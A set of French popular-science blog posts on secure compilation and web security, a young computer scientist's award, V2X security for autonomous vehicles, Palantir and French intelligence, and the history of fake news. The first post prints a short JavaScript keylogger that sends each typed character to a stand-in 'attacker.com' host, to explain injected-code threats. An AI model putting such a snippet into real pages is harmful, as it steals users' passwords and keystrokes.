    Comment garantir la sécurité de l’exemple alors ? Cet exemple illustre que la sécurité de votre programme ne dépend pas seulement du code écrit par le développeur. Mais, comme disait Saint-Exupéry, l’essentiel est invisible pour les yeux. L’essentiel pour la sécurité est que le code qui va s’exécuter soit sûr. Ce code et sa sécurité dépendent du compilateur et de l’environnement d’exécution, comme le hardware. L’idéal serait de disposer d’un compilateur qui traduise correctement le code source en code binaire tout en préservant les propriétés de sécurité, de disposer d’un environnement sûr, d’une mémoire vraiment protégée par le hardware et le système d’exploitation.

    Propriétés de sécurité.

    Parmi les propriétés de sécurité, deux classes sont particulièrement utiles : la confidentialité et l’intégrité. La propriété de confidentialité assure que des données confidentielles, par exemple votre code secret, ne pourront pas être lues par l’attaquant. La propriété d’intégrité assure que des données sensibles, par exemple le montant du virement bancaire que vous allez effectuer, ne pourront pas être modifiées par l’attaquant.Prenons comme exemple un programme, qui ne possède pas ces propriétés de sécurité, dans le domaine du web. Disons que ce programme télécharge une image lorsque l’on clique sur une touche du clavier. Le code pourrait se présenter sous cette forme :

     onkeypress = function(e) {
     new Image().src = url;
    }
    

    Si l’attaquant s’introduit dans l’environnement d’exécution, il pourra alors changer le code de la manière suivante:

     url = 'http://attacker.com/?='; 
    onkeypress = function(e) {
      var leak = e.charCode;
      new Image().src = url + leak;
    }
    

    Ce code source envoie la valeur de chaque caractère tapé avec le clavier vers un serveur «  http://attacker.com ». Pourquoi ce code constitue-t-il une attaque ? Imaginons que cette page est la page d’accueil du site PayPal, outil de virement en ligne. À chaque fois que vous tapez un caractère de votre mot de passe, celui-ci sera envoyé à l’attaquant. Tout cela sans même que vous vous en rendiez compte, puisque la page web fonctionne comme d’habitude. L’attaquant récupère donc votre mot de passe et pourra réaliser sans peine des virements à partir de votre compte vers le compte de son choix.

    © Tamara Rezk, paypal.com et wpclipart.com

    Pour ceux qui utilisent le site de PayPal ne vous inquiétez pas: l’attaque décrite ici n’existe pas sur le site actuel de PayPal (mais il a eu d’autres attaques sur ce même site, voir Attaque PayPal). Par contre, l’attaque décrite ici est tout de même envisageable sur d’autres sites. Si vous pensez : « mais non, il est impossible que le code de l’attaquant se retrouve dans l’environnement d’une page web !», alors visitez votre page web préférée et regardez attentivement : voyez-vous de la publicité ? La publicité est un excellent moyen, mais pas le seul, pour l’attaquant d’injecter son code. Le code servant à présenter une publicité provient de serveurs tiers, différents de celui qui sert la page que vous visitez. La publicité est à la base du modèle économique du web, et de ce fait, elle est omniprésente sur la plupart des sites web.

    Mais quel est le lien avec les compilateurs sûrs mentionnés plus haut ? Comme dans le cas des compilateurs, le code source envoyé par le serveur web est différent du code exécuté dans le navigateur. Cette transformation ne constitue pas nécessairement une compilation. Le code qui s’exécute dans le navigateur peut être différent du code source parce qu’il est enrichi avec du code provenant de serveurs tiers, comme les bandeaux de publicité par exemple. Les transformations du code qui préservent les propriétés de sécurité et le développement de langages de programmation avec des compilateurs sûrs constituent aujourd’hui des domaines actifs de recherche.

    En conclusion, rappelons simplement que pour être sûr, votre programme doit non seulement satisfaire des propriétés de sécurité, mais ces propriétés doivent être conservées tout au long des transformations qu’il subit jusqu’à son exécution.

    Tamara Rezk, Inria (Equipe-projet Indes, Sophia-Antipolis).

    Appendice : Recherche scientifique sur la compilation sûre.

    Les transformations du code qui préservent les propriètes de sécurité et le développement de langages de programmation avec des compilateurs sûrs constituent aujourd’hui des domaines actives de recherche.
    Par exemple, le projet ERC SECOMP a comme objectif d’utiliser des capabilités de hardware pour définir des compilateurs sûrs pour des langages comme le langage C. Pour avoir la sécurité sans sacrifier l’efficacité, ce projet propose la compilation sûre vers une architecture qui associe une étiquette à chaque partie de la mémoire. Ces étiquettes, que indiquerons une politique de sécurité, seront en
    suite inspectées et vérifiées.
    Un autre projet, le projet ANR CISC a comme objectif définir des langages
    de programmation et des compilateurs sûrs pour l’IoT. Pour avoir la sécurité
    dans un environnement complètement hétérogène, ce projet propose l’utilisation
    des langages multitiers, c’est à dire des langages qui permettent de programmer tous les composantes de l’IoT – serveur, clients, objets physiques, avec un
    seul code. Ce langage sera ensuite compilé de manière sûre vers les différentes
    architectures.
    D’autres travaux sont menés à KU Leuven qui étudient la compilation sûre vers des architectures conçu spécifiquement pour la sécurité, comme par exemple l’architecture Intel SGX.

  • Parce qu’elle le vaut bien

    La Fondation L’Oréal remettait le 11 octobre 2017 à 30 jeunes femmes leurs bourses 2017 L‘Oréal-UNESCO Pour les Femmes et la Science en partenariat avec l’Académie des sciences et la Commission nationale française pour l’UNESCO. Ce programme identifie et récompense de jeunes chercheuses talentueuses dans les sciences formelles, les sciences du vivant et de l’environnement, les sciences de la matière, les sciences de l’ingénieur et technologiques. Florence Sèdes qui anime à la Société Informatique de France le groupe « femmes & informatique » partage ici le beau succès en informatique de Tahina Ralitera. Serge Abiteboul et Thierry Viéville.

    30 jeunes femmes scientifiques au parcours d’excellence ont reçu la bourse « Pour les Femmes et la Science » doté de 15 000€ pour les doctorantes et de 20 000€ pour les post-doctorantes. Elles ont été sélectionnées parmi plus de 1 000 candidates par un jury indépendant composé d’académiciens qui ont tenu à récompenser l’excellence de leur niveau académique, l’originalité de leur projet scientifique, mais aussi leur désir de transmettre leur passion aux plus jeunes.

    « Depuis 10 ans, la Fondation L’Oréal s’engage en faveur des femmes dans le monde afin de les soutenir et de les valoriser. A travers le programme Pour les Femmes et la Science, nous avons déjà pu soutenir plus 2700 jeunes femmes scientifiques pour les aider à briser le plafond de verre », déclare Alexandra Palt, Directrice Générale de la Fondation L’Oréal.

    Tahina Ralitera, jeune informaticienne malgache, actuellement en troisième année de doctorat au Laboratoire d’Informatique et de Mathématiques de l’Université de La Réunion, figure parmi les lauréates.

    Tahina Ralitera a 24 ans. En 2009, elle obtient à Madagascar, son île natale, un baccalauréat série C et réussit le concours d’entrée à l’École Supérieure Polytechnique d’Antananarivo, dans la filière télécommunications. En 2013, elle reçoit une bourse du gouvernement français pour poursuivre des études d’ingénieur en informatique et télécommunications à l’École Supérieure d’Ingénieurs Réunion Océan Indien à La Réunion. Elle obtient un Master 2 en 2016, major de promotion. Diplômée ingénieure en Informatiques et Télécommunications, elle se lance dans une thèse d’informatique.

    Laissons parler Tahina Ralitera : cette bourse représente une réussite pour moi, j’en suis très fière. Étant moi-même dans une discipline dite « masculine », la promotion de la participation de la femme dans la recherche scientifique est une cause qui m’importe beaucoup. Dès mon plus jeune âge, mes parents m’ont orientée vers un parcours scientifique, par le choix des dessins animés ou des émissions télévisées qu’ils me faisaient regarder, par les livres qu’ils me faisaient lire, en m’incitant à visiter des salons scientifiques. Tout cela a cultivé mon intérêt pour les sciences. Je voulais devenir médecin, puis chimiste, puis biologiste, puis physicienne, puis astronaute, finalement, je me suis orientée vers l’informatique, une discipline que j’ai découverte assez tard, au lycée. Le cybercafé du coin (nous n’avions pas d’ordinateur à la maison, et les connexions étaient payantes à la durée) offrait un cours d’initiation à l’informatique où ma mère m’a inscrite. C’est à ce moment-là que s’est révélée ma passion pour l’informatique.

    Tahina Ralitera a commencé une thèse sous la direction du Professeur  Rémy Courdier, spécialiste des « Systèmes Multi-Agents ». Son travail doctoral vise à développer un simulateur des flux de véhicules électriques sur un territoire, un outil d’aide à la décision pour placer des bornes de recharge et éviter les pannes.

    Pour sa première conférence, elle se rend au Portugal, découvre la couverture wifi et le covoiturage avec des véhicules  électriques. Elle prend conscience de la richesse de son sujet et plus largement de la mobilité dans des villes dites  »intelligentes ». Le concept s’impose à elle : Une île  intelligente ! Mon projet ne se limite pas à la mobilité ou aux  bâtiment, c’est tout un système ! Il faut penser à la gouvernance,  l’économie, l’éducation, la santé.

    C’est cette vision globale de services qu’on va appeler île intelligente.

    La Réunion dans vingt ans, elle l’imagine déjà, avec une  circulation plus fluide et une meilleure qualité de vie.  La  voiture électrique a-t-elle une place dans cet avenir ? Si on arrive à  développer l’infrastructure, ça résoudra en partie le problème, car les  gens ont encore peur d’être à court de batterie à Cilaos et de ne pas  pouvoir revenir ! Quant à la voiture électrique en libre service, elle  sait que techniquement, c’est tout à fait possible. Elle a  déjà réalisé un prototype logiciel qui fonctionne à Londres dans le cadre d’une collaboration avec l’Imperial College. Un deuxième prototype pour La Réunion est en cours de  validation.  Si elle n’a jamais encore conduit de voiture électrique à La Réu­nion, Tahina  Ralitera est en mesure de proposer une carte de l’île avec tous  les points de recharge utiles pour développer une flotte de véhicules  électriques ! Il lui faut aussi réfléchir aux impacts sociétaux, à ce qui pourrait freiner le déploiement de la voiture électrique sur l’île.

    Florence Sèdes, chercheuse en informatique à l’IRIT et membre du CA de la SIF.

  • Sécurité routière et cybersécurité

    Avec les objets connectés, notre sécurité est remise en question. Binaire publiait l’an dernier une nouvelle « You are under arrest » qui essayait d’imaginer ce qui pourrait se produire dans le futur si, aujourd’hui, nous n’accordons pas au sujet de la sécurité, toute l’importance qu’il mérite. Nous avons demandé à Gérard Le Lann, un spécialiste de la question, de nous expliquer cette fois techniquement ce qu’il en était. Serge Abiteboul.

    Une réduction significative du nombre d’accidents graves (invalidités, pertes de vies humaines) et une meilleure efficacité (réduction des temps de trajet, quasi-élimination des embouteillages) sont deux des buts principaux de la conduite automatisée (avec ou sans chauffeur humain). Les buts d’innocuité (*) et d’efficacité ne pouvant être atteints en se limitant à la robotique embarquée (radars, lidars, caméras, etc.), des travaux ont été entrepris dès 2004 dans le but de doter les véhicules d’émetteurs/récepteurs radio. Cela a conduit au concept de véhicule autonome « connecté » (VAC). À partir de 2020, les véhicules mis en circulation aux USA devront être dotés d’équipements radio conformes aux solutions WAVE (pour Wireless Access in Vehicular Environments) actuelles, qui comprennent un ensemble de protocoles basés sur des télécommunications de type wifi, connues sous l’acronyme V2X (vehicule-to-everything), permettant à un VAC d’être « connecté » à des relais terrestres (infrastructures routières, réseaux de télécommunications) et de communiquer avec d’autres VAC. Si rien ne l’entrave, cette décision s’imposera en Europe et ailleurs. Cette perspective est inquiétante.

    Waymo Chrysler Pacifica Hybrid, testée dans la région de la Baie de San Francisco.Wikipedia

    On sait que, dans des conditions de trafic moyennement dense, le nombre de véhicules en compétition pour accéder au canal radio partagé est tel que les délais de transmission de message sont trop grands pour éviter les accidents. En outre, les communications radio étant non fiables, les messages V2X émis peuvent ne pas être reçus par les destinataires visés. Il est donc impossible de prédire quoi que ce soit concernant la coordination inter-véhiculaire. Des diffusions périodiques de balises sont censées procurer l’innocuité désirée. Tout véhicule doit diffuser, entre 1 fois et 10 fois par seconde, un message V2X daté donnant, en particulier, sa géolocalisation et sa vitesse, nécessairement non chiffrées. L’idée sous-jacente est que les VAC co-localisés peuvent maintenir la même carte donnant leurs positions exactes et celles des véhicules qui les environnent, et ainsi éviter les accidents. C’est malheureusement faux. A raison de 10 balises par seconde, en conditions de trafic moyennement dense, le canal radio est vite saturé. Du coup, les véhicules ne peuvent plus être géolocalisés. A des fréquences plus faibles, en présence de pertes de balises, les cartes des VAC ne peuvent être identiques. En dépit du gaspillage de ressources de calcul et de communication, on ne peut éviter les accidents.

    Du point de vue « connexion », avec WAVE, les VAC sont équivalents à des smartphones-sur-roues. Ils sont donc potentiellement sujets à cyberespionnage et vulnérables aux cyberattaques dont sont victimes les équipements radio sans fil. Le problème est que les smartphones-sur-roues peuvent tuer. La possibilité d’une prise de contrôle à distance de véhicule a été démontrée à plusieurs reprises, lors de conférences Black Hat et par des agences gouvernementales. Les techniques cryptographiques en cours de normalisation destinées à contrer le cyberespionnage et les cyberattaques (usurpation d’identité, falsification de messages légitimes, injection de messages frauduleux, etc.) n’éliminent pas complètement les vulnérabilités. Par exemple, les attaques de « l’homme du milieu » (**) sont possibles. On montre également qu’il est possible de pister les trajets, en reliant des géolocalisations. Même avec des messages V2X « anonymisés », si l’on peut associer des lieux fréquemment visités (par exemple un lieu de travail et un lieu de résidence), alors le piratage de données d’ordre privé devient réalisable. Ces faiblesses sont connues mais la communauté WAVE 1.0 (***) tente de s’en dédouaner en affirmant que l’on ne peut faire mieux. C’est faux.

    D’autres solutions proposées plus récemment (toute une gamme que nous appellerons ici WAVE 2.0) permettent de garantir à la fois l’innocuité maximale et la cybersécurité « by-design ». Les protocoles WAVE 2.0 reposent sur des communications directes V2V (vehicule-to-vehicle) qui garantissent des délais d’échange de messages et de coordination inter-véhiculaire extrêmement courts, ce qui permet de prouver l’innocuité. Les technologies de communications radio et optiques utilisées sont de courte portée et bien plus performantes que les technologies WAVE. Les messages V2V n’étant échangés qu’entre voisins « immédiats », les attaquants potentiels d’un VAC sont aisément et immédiatement détectables, ce qui permet de prouver que les cyberattaques rapprochées ne peuvent mettre en péril l’innocuité (une propriété fondamentale). Les identifiants des VAC émetteurs de messages V2V étant totalement anonymisés, le cyberespionnage rapproché n’est d’aucun intérêt.

    L’architecture des systèmes bord des VAC garantit que les télécommunications V2X ne peuvent avoir d’impact sur la robotique du véhicule. Ainsi, la prise de contrôle à distance devient infaisable. Plus généralement, on peut montrer que les cyberattaques ourdies par des entités inconnues distantes ne peuvent mettre en péril l’innocuité. Quant aux risques de cyberespionnage distant, ils n’existent qu’à la condition d’autoriser les télécommunications V2X sortantes (accès à Internet, etc.). Il est donc indispensable d’offrir à un passager de VAC la possibilité d’exprimer via une option « furtivité » son refus ou son consentement pour activation des télécommunications sortantes V2X individuelles. Avec WAVE 2.0, en cas de comportement malveillant, la robotique embarquée prend le contrôle du VAC et l’immobilise en lieu sûr, pendant que sont diffusés, à destination des autorités, des messages V2X chiffrés permettant d’identifier et de géolocaliser le véhicule immobilisé, ainsi que de fournir le contenu pertinent d’une boite noire. Malgré l’anonymat, les enregistrements consignés dans les boites noires assureront l’indispensable imputabilité (****).

    Les capteurs intérieurs à un VAC (caméras, par exemple) dont les avantages sont abondamment médiatisés (s’assurer de la vigilance humaine, par exemple) sont des sources supplémentaires de cyberespionnage. Les atteintes à la vie privée sont bien certaines. Que deviennent ces données, notamment en cas de piratage des serveurs qui les hébergent ? Les passagers des VAC ont pourtant droit au respect de leur vie privée. Tout comme l’option « furtivité », une option « désactivation des capteurs intérieurs » doit être offerte.

    Les voitures autonomes Navlab. Navlab 5 (le véhicule le plus proche ) achevé et 1995, a été la première voiture à traverser en autonome les États-Unis d’une côte à l’autre.

    Faux dilemme—Vrai choix de société

    Nous n’avons pas à choisir entre innocuité et cybersécurité, les deux propriétés existent avec WAVE 2.0. Nous sommes donc dès à présent confrontés à un choix de société :

    • soit les solutions WAVE 1.0 sont déployées, et alors nous seront potentiellement cybersurveillés et sujets aux cyberattaques lors de nos déplacements motorisés,
    • soit, grâce aux actions combinées des mondes académique, juridique, de sociologues, de spécialistes de l’éthique, du monde industriel et des autorités gouvernementales européennes, nous leur préférons au contraire les solutions WAVE 2.0 et leurs options « furtivité » et « désactivation des capteurs intérieurs », qui vont dans le sens du Règlement Général sur la Protection des Données. WAVE 2.0 deviendrait ainsi le socle d’une nouvelle génération de standards pour les technologies des véhicules autonomes du futur.

    Dans quel type de société voulons-nous vivre ? Voilà la question qui est posée.

    Gérard Le Lann, Inria

    NB : le lecteur intéressé pourra consulter la publication C&ESAR 2017

    (*) Non-dangerosité (quasi élimination des accidents graves).

    (**) L’attaque de l’homme du milieu (man-in-the-middle attack) a pour but d’intercepter les communications entre deux parties, sans que, ni l’une, ni l’autre ne puisse se douter que le canal de communication entre elles a été compromis. L’attaquant doit d’abord être capable d’observer et d’intercepter les messages envoyés par une victime, disons Alice, à l’autre, Bob. L’attaquant parle à Alice en prétendant être Bob, et à Bob en prétendant être Alice.

    (***) WAVE 1.0 (WAVE + balisage périodique) et WAVE 2.0 sont des notations d’ordre pratique proposées par l’auteur.

    (****) Attribution des responsabilités et non-dénégation des causes ayant entrainé un accident grave.

  • Les liaisons dangereuses du renseignement français

    L’analyse de données massives, le big data, a de nombreuses applications : on peut vouloir faire parler les données dans de nombreux domaines. Nous nous intéressons ici à un en particulier, le renseignement.   Des matériels informatiques de plus en plus puissants, des algorithmes de gestion et d’analyse de données de plus en plus sophistiqués, la disponibilité de données numériques de plus en plus massives changent notre monde. Ils permettent des avancées extraordinaires de la recherche scientifique dans de nombreux domaines, comme la médecine, l’astronomie ou la sociologie. Ils mettent à notre service des outils fantastiques comme, aujourd’hui, des moteurs de recherche du Web tel Qwant (1) et, peut-être demain, les systèmes d’informations personnelles tel celui en cours de développement par l’entreprise française Cozy Cloud. Ils sont beaucoup utilisés par les entreprises, par exemple pour le marketing… et aussi par les gouvernements. Il suffit de collecter des masses de données numériques – on y trouvera toute l’intelligence (au sens anglais (2)) du monde – pour lutter contre la criminalité, détruire ses opposants politiques, découvrir les secrets industriels de ses concurrents.

    © Progressistes

    Une société s’est imposée sur ce marché juteux, Palantir Technologies. Le cœur de leur technologie est un système, Palantir Gotham, qui permet d’intégrer massivement des données structurées (provenant de bases de données) et non structurées (par exemple des textes du Web ou des images), de faire des recherches sur ces données, de les analyser, d’en extraire des connaissances.

    Comment ça marche ?

    La difficulté est de comprendre le sens des données. Celles d’une entreprise sont relativement propres et bien structurées. Quand nous utilisons les données de plusieurs entreprises, quand nous les « intégrons », c’est déjà moins simple. Les données sont organisées différemment, les terminologies peuvent être différentes. Par exemple, les deux systèmes peuvent utiliser des identifiants différents pour une même personne, des adresses ou des courriels différents, etc. Les informations du Web et des réseaux sociaux peuvent être encore plus difficiles à extraire : les personnes utilisent parfois juste des prénoms ou des surnoms; les imprécisions, les erreurs, les incohérences sont fréquentes; surtout, les données sont très incomplètes. En outre, une grande masse des informations disponibles consiste en des textes et des images où il faut aller chercher des connaissances.

    Les « progrès » de la technique ont été considérables ces dernières années. Par exemple, le système XKeyscore, un des bijoux (en termes de coût aussi) de la NSA, peut réunir, pour une personne, quasi instantanément la liste de ses appels téléphoniques, de ses paiements avec une carte de crédits, de ses courriels, ses recherches Web, les images de vidéosurveillance d’un magasin où elle a réalisé des achats… Palantir propose à ses utilisateurs XKeyscore Helper pour importer des données de XKeyscore, les interroger, les visualiser, les analyser et les réexporter.

    Palentir et la DGSI

    Est-ce la fin de la vie privée ? Ne s’agirait-il là que d’exagérations ? De la parano ? J’ai peur que non. Nous n’en sommes pas encore là en France, même si des lois comme la celle de 2015 relative au renseignement nous engagent dans cette direction. Heureusement, nos services de renseignements ont moins de moyens, et d’autres textes, la loi informatique et libertés ou le règlement européen sur la protection des données personnelles à partir de 2018, nous protègent.

    Revenons à Palantir. Parmi ses premiers investisseurs, on trouve la CIA, et parmi ses clients étatsuniens, la CIA, la NSA, le FBI, les Marines, l’US Air Force, les Forces d’opérations spéciales. La technologie de Palantir est utilisée notamment pour relier les données de plusieurs agences de renseignement et leurs permettre ainsi de coopérer. Depuis 2016, Palantir travaille aussi en France pour la Direction générale de la sécurité intérieure. Nous nous inquiétons peut-être pour rien, mais que font-ils pour la DGSI ? À quelles données sur des Français ont-ils accès ? Dans le cadre de la transparence de l’État, il nous semble que nous avons le droit de savoir.

    Naïvement, nous aurions aussi pu penser que, sur des données de sécurité intérieure, une entreprise européenne aurait été plus appropriée, ne serait-ce que parce qu’elle serait plus directement soumise aux lois européennes.

    Pour tenter de nous rassurer, nous pouvons consulter le site Web de Palantir, où sous l’intitulé What We Believe (Ce que nous croyons), on peut lire :

    « Palantir is a mission-focused company. Our team is dedicated to working for the common good and doing what’s right, in addition to being deeply passionate about building great software and a successful company. » (Palantir est une entreprise concentrée sur sa mission. Notre équipe est dévouée à travailler pour le bien commun et à faire ce qui est bien, en plus d’être profondément passionnée par la création de logiciels géniaux et d’une entreprise prospère.)  

    Certes, mais après nombre de révélations, notamment celles d’Edward Snowden sur des programmes de surveillance à l’échelle mondiale, impliquant la NSA ou l’alliance de renseignement Five Eyes (Australie, Canada, Nouvelle-Zélande, Royaume-Uni, États-Unis), nous pouvons difficilement nous contenter de bonnes intentions.

    Airbus parmi les clients

    Parmi les clients de Palantir, on trouve aussi Airbus. Il s’agit dans ce cas, en principe, d’intégrer des informations dispersées sur plusieurs systèmes d’Airbus, et de les analyser pour comprendre les problèmes de qualité des A350. C’est pour la collecte, l’intégration et l’analyse de données qu’Airbus utilise la technologie et l’expertise de Palantir. Nous pouvons bien sûr nous réjouir de l’amélioration de la sécurité de l’A350. Mais, n’y a-t-il pas à craindre que des informations stratégiques se retrouvent par hasard, via les réseaux de la CIA proches de Palantir, dans les mains de concurrents d’Airbus ? Ne dites pas que c’est improbable ! Naïvement, nous aurions aussi pu penser que, sur de telles données, une entreprise européenne aurait été plus appropriée, ne serait-ce que pour éviter trop de connexions occultes avec des entreprises étatsuniennes ou asiatiques.

    Si nous préférons penser que les services de renseignement français et ceux de la sécurité d’Airbus sont compétents, responsables, et qu’ils savent ce qu’ils font, nous pouvons légitimement nous inquiéter de les voir utiliser les services d’une société étatsunienne proche des services secrets et dont un des fondateurs est Peter Thiel, un libertarien, aujourd’hui conseiller numérique de Donald Trump, qu’il a soutenu tout au long de la campagne électorale qui mena Trump à la Maison-Blanche.

    L’analyse de données massives est un outil moderne pour lutter contre le terrorisme. En croisant les bases de données des différentes agences gouvernementales, on peut détecter des comportements suspects, des activités qui intéressent la lutte antiterroriste. J’ai été marqué par ce que m’a dit un jour (c’était avant le 13 novembre 2015) un officier de renseignement : « S’il y a un attentat terroriste majeur en France, on nous reprochera de ne pas avoir fait tout ce qui était en notre pouvoir pour l’empêcher. » Pourtant, cette surveillance massive de la population, d’individus a priori suspects… ou pas dans des pays démocratiques peut raisonnablement inquiéter, être prise pour une atteinte aux libertés. C’est bien là le dilemme. Après chaque attentat, les politiques, bouleversés par les images, l’horreur, sont prêts à tout pour éviter que cela se reproduise, même à restreindre les libertés. On peut les comprendre. Mais, entre l’épouvante du terrorisme et la répulsion du totalitarisme, il faut choisir où placer le curseur. Peut-être faudrait-il garder en tête que le renseignement intérieur se fait, dans un état de droit, sous le contrôle de la justice et ne surtout pas oublier qu’un affaiblissement de la démocratie est une victoire du terrorisme.

    Serge Abiteboul, Arcep, Inria et École normale supérieure, Paris.

    (1) Qwant est un moteur de recherche européen qui préserve la vie privée et ne transmet ni ne retient donc d’informations vous concernant.

    (2) En effet, nul ne penserait à traduire Intelligence Service par « service intelligent », ça se saurait !

    Pour en savoir plus

    • Sam Biddle, How Peter Thiel’s Palantir Helped the NSA Spy on the Whole World, The Intercept, 2017.
    • Ashlee Vance et Brad Stone, Palantir, the War on Terror’s Secret Weapon, Bloomberg Businessweek, 2011.
    • Vous pouvez aussi consulter ce blog.

    Cet article est paru originellement dans la revue Progressistes, Numéro 18, oct-nov-déc 2017. Le numéro, dans sa totalité, est disponible électroniquement ou en format papier.

  • Rien de nouveau dans les Fake News

    Le 25 octobre 2017, une session passionnante d’Inria Alumni était consacrée au phénomène des Fake News au Conservatoire National des Arts et Métiers en partenariat avec la Société Informatique de France, avec Francesca Musiani (CNRS), Ioana Manolescu (Inria) et Benjamin Thierry (Université Paris-Sorbonne). Ce dernier est maître de conférences en histoire contemporaine et Vice-président chargé des Humanités numériques et des Systèmes d’information à l’Université Paris-Sorbonne. Binaire lui a demandé de nous apporter son point de vue d’historien sur le sujet. Serge Abiteboul.

    Fake News et post-vérité ont été mis sous le feu des projecteurs en 2016 à l’occasion de la dernière présidentielle états-unienne. À la suite de cette couverture médiatique mondiale, le dictionnaire Oxford choisit « post-truth » comme mot de l’année. Le terme est pourtant déjà ancien puisqu’on le voit émerger dès 2004 dans les travaux de Ralph Keyes[1]. Ce dernier étudie alors la viralité qui semble désormais primer sur la véracité dans la circulation de plus en plus massifiée, décentralisée et accélérée de l’information.

    C’est alors que Donald Trump est porté à la magistrature suprême que le grand public découvre par la presse que des entreprises de manipulation de grande envergure ont accompagné et probablement favorisé la défaite d’Hillary Clinton et la victoire du candidat républicain. Au-delà de l’espace nord-américain, ces fausses nouvelles seraient désormais la norme et de nombreuses analyses convergent pour expliquer les conditions supposées du débat public à l’heure des réseaux.

    Anatomie d’une fausse nouvelle

    En premier lieu, c’est la composante technique du débat public qui est le plus régulièrement pointée du doigt. Fabrice Arfi considère le numérique responsable d’ « une forme d’horizontalité et de viralité très particulière » qui favorise le recours au mensonge comme arme politique[2] ; Frank Rebillard dans son article sur le PizzaGate considère que « les schèmes conspirationnistes, dont la rumeur en ligne constitue l’un des véhicules privilégiés, trouvent avec le numérique et l’Internet des éléments documentaires de nature à renforcer l’illusion d’une démonstration de leurs constructions intellectuelles[3]. » Bruno Patino voit également dans nos nouveaux outils d’information et l’habitude prise du partage immédiat le ferment de la post-vérité : « Ce qu’on appelle « post-vérité » et fake news, c’est le symptôme d’une transition qui a commencé avec le smartphone. On a oublié ce qu’est un fait : le fait commence à exister avec le télégraphe. Les endroits où il y a un pouvoir ou bien où il se passe quelque chose, télégraphient le fait brut : « Le ministre a déclaré que… », « Il y a douze morts à tel endroit ». La séparation fait /analyse, fondatrice du journalisme, vient de là. On transmettait l’info, sans transformation, puis on hiérarchisait et on commentait ces informations. Aujourd’hui, le fait ne se transmet plus, il se partage. Or le partage transforme le fait à tout moment, à tel point que la traçabilité du fait est désormais une question essentielle[4]»

    Autre facteur souvent cité pour expliquer l’irruption des fausses rumeurs et fortement lié à la supposée dictature technique des réseaux, notre tendance à rechercher l’immédiateté dans la consommation, mais surtout dans les relais que nous donnons à l’information. « Tout a lieu en temps réel et instantanément. Il n’y a pas de temps pour la réflexion ni de pause pour la pensée ou le souvenir […] nous n’avons plus besoin de nous souvenir puisque la technique le fait pour nous[5] » nous explique Manya Steinkoler avant de souligner que nous sommes également poussés à chercher les informations qui nous confortent dans nos opinions et croyances plutôt que des éléments déstabilisants parce que divergents d’avec nos idéologies personnelles ; tendance encore renforcée par les phénomènes de bulles filtrantes. Ajoutons les réseaux sociaux qui, dans leur fonctionnement même, n’ont pas fondamentalement intérêt – hors des déclarations d’intention de leurs fondateurs pour rassurer utilisateurs et autorités – à limiter le recours au mensonge : une information est une information qu’elle soit vraie ou fausse : « Facebook a intérêt à ce que l’info se partage beaucoup et vite et une info scandaleuse et fausse se partage mieux et plus vite qu’une info ennuyeuse, mais vraie[6]. »

    Enfin, il existe un marché de la rumeur, instrumentalisée à des fins partisanes, comme l’a montré le New York Times avec l’exemple de Cameron Harris et d’autres.

    Modernité technologique chaotique, horizontalité, recherche d’immédiateté effrénée et acteurs intéressés à la monétisation du mensonge, voici les principaux éléments qui sont évoqués pour expliquer la prolifération des fake news et l’entrée dans l’ère de la post-vérité dont notre époque serait frappée.

    La longue histoire du faux

    Tous ces facteurs semblent s’entretenir mutuellement, mais contribuent-ils réellement à créer une rupture dans l’histoire de l’information et de ses rapports à nos démocraties occidentales ? Ne cédons-nous pas à une idéalisation du passé comme à chaque fois que le présent nous déçoit ?

    Force est d’abord de constater que l’instrumentalisation du mensonge et de la rumeur ne date pas d’hier. Les formes mêmes de cette instrumentalisation n’ont finalement pas beaucoup changé. Dans un article important de 2017, Catherine Bertho rappelle que les mazarinades au XVIIe siècle ou les campagnes de dénigrement de Marie-Antoinette au siècle suivant reposent elles aussi sur le mensonge structuré autour d’« un labyrinthe de textes éphémères, elliptiques, bourrés d’allusions aux événements du jour, rompu à toutes les ruses de la controverse[7]. » Les calomnies circulent « par rebonds. Les textes, loin de développer des argumentaires cohérents, se répondent de façons confuses et embrouillées ». Ces opérations de guérilla médiatique visent à la désacralisation et à la déligitimisation du pouvoir en place et de l’adversaire. Dans le cas des libelles contre Marie-Antoinette, « ils sont fabriqués par des officines et diffusés par des médias marginaux avant d’alimenter la rumeur avec une impitoyable efficacité. L’accusation d’inceste, par exemple, poursuivra la reine jusque devant le tribunal révolutionnaire[8]. »

    Confortablement installés dans notre modernité technologique contemporaine, nous n’échappons pas non plus à ce brouillage du réel dont les effets ne sont certes et heureusement pas comparables. Dans son numéro 115, Le Monde Diplomatique publie une enquête saisissante sur l’économie des « pièges à clics » qui incarnent la forme numérisée de la presse à scandale au travers de plusieurs témoignages de salariés de Melty, Konbini ou BuzzFeed. Gouvernées par la recherche du lectorat à tout prix au moyen d’outils de surveillance des tendances supposées de l’actualité, ces rédactions font elles aussi peu cas de la « vérité » tel qu’on peut s’y attendre chez des journalistes : « Dès que l’algorithme voyait un sujet remonter dans les statistiques, il fallait faire un article dessus, même s’il n’y avait pas d’info. Une fois, je suis allée voir la rédactrice en chef, et je lui ai dit que je n’avais pas d’info sur le thème demandé (la chanteuse Britney Spears). Elle m’a répondu : ‘Ce n’est pas grave, tu spécules’[12]. »

    Les fake news sont-elles faites pour être crues ?

    Lecteurs abusés, citoyens déboussolés et trompés, ce panorama peut faire craindre un affaiblissement possiblement fatal de notre capacité à fonder notre jugement. L’information conçue depuis la loi de 1881 comme l’élément déterminant de l’exercice raisonné de la citoyenneté est de moins en moins fiable. À l’heure du fake globalisé, c’est désormais sur le fonctionnement même de nos démocraties que pèse la menace du grand brouillage rendant notre action citoyenne dépourvue de sens.

    Un premier élément de réflexion à la lumière des exemples évoqués ci-dessus pourrait être qu’il ne faut pas idéaliser un passé que l’on érigerait en âge d’or de la vérité. Le lecteur de ou du Figaro était-il mieux informé et moins soumis à l’orientation de ses lectures que l’internaute d’aujourd’hui ? Le contexte est différent et la surcharge informationnelle a succédé à la rareté, mais considérer nos aïeux comme de parfaits acteurs rationnels en matière politique est une erreur que la littérature historienne sur le vote, l’histoire de la république et le politique en général a démystifiés depuis belle lurette.

